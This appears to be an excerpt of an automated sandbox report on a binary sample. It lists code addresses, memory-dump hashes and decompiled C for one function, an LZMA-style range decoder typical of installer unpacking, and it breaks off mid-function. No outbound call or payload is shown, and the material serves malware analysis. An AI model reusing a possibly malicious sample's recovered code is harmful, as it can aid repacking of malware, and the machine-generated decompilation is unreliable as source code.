                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407395
                    0x00407399
                    0x004073bb
                    0x004073be
                    0x004073c8
                    0x00000000
                    0x004073c8
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a5
                    0x004073a8
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00407489
                    0x00407489
                    0x00000000
                    0x00407489
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c7
                    0x004074c7
                    0x004074cb
                    0x0040752b
                    0x0040752e
                    0x00407533
                    0x00407534
                    0x00407536
                    0x00407538
                    0x0040753b
                    0x00000000
                    0x0040753b
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074eb
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x0040751d
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x00000000
                    0x00407390
                    0x0040738e
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                    • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                    • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                    • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
